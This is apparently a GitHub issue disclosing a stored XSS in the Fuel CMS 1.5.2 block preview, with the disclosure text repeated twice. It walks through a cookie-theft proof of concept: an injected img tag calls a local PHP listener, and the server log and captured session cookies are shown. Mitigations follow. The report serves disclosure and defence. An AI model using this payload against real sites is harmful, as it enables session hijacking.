You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Fuel CMS 1.5.2 uses a text editor for publishing pages and creating blocks. This editor has a preview feature that allows a moderator/admin to show a preview of the post before posting it.
This feature is vulnerable to XSS because if a user embeds malicious JavaScript then it gets executed once the post is previewed.
Reproduce
To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.
Launch a PHP server to serve this file: php -S 0.0.0.0:1718
Login to FuelCMS and go to blocks section of the CMS: http://127.0.0.1/fuelcms/fuel/blocks
Create a block and then open it for edit: http://127.0.0.1/fuelcms/fuel/blocks/edit/1
In the view field where you have a larger textarea for editing the document, write the following payload & save it: <img src='http://127.0.0.1:1718/capture.php' alt='dune'>
Now, click on “Preview” button and you will get connections in your PHP server:
[Wed Jan 8 10:09:20 2025] 127.0.0.1:53440 Accepted
[Wed Jan 8 10:09:20 2025] 127.0.0.1:53440 [200]: GET /capture.php
[Wed Jan 8 10:09:20 2025] 127.0.0.1:53440 Closing
Open cookie_log.txt and you shall see the cookies that were stolen: [2025-01-08 15:09:20] Cookies: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; ci_session=r0qirem7e4s1ascfhp4v60a82i02vlnr
Mitigation steps
Sanitize Input: Use a library like HTMLPurifier to sanitize user input and strip dangerous tags and attributes before saving to the database
Encode Output: Ensure all user-generated content is encoded with htmlspecialchars() or similar before rendering to prevent script execution
Restrict Allowed HTML: Implement a whitelist of safe HTML tags and attributes to allow only essential formatting in the preview
Authenticated XSS in block preview
Fuel CMS 1.5.2 uses a text editor for publishing pages and creating blocks. This editor has a preview feature that allows a moderator/admin to show a preview of the post before posting it.
This feature is vulnerable to XSS because if a user embeds malicious JavaScript then it gets executed once the post is previewed.
Reproduce
To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.
Save the following file as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Launch a PHP server to serve this file:
php -S 0.0.0.0:1718Login to FuelCMS and go to blocks section of the CMS:
http://127.0.0.1/fuelcms/fuel/blocksCreate a block and then open it for edit:
http://127.0.0.1/fuelcms/fuel/blocks/edit/1In the view field where you have a larger textarea for editing the document, write the following payload & save it:
<img src='http://127.0.0.1:1718/capture.php' alt='dune'>Now, click on “Preview” button and you will get connections in your PHP server:
Open cookie_log.txt and you shall see the cookies that were stolen:
[2025-01-08 15:09:20] Cookies: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; ci_session=r0qirem7e4s1ascfhp4v60a82i02vlnrMitigation steps
Contact me
hkohi.ca | [email protected]
The text was updated successfully, but these errors were encountered: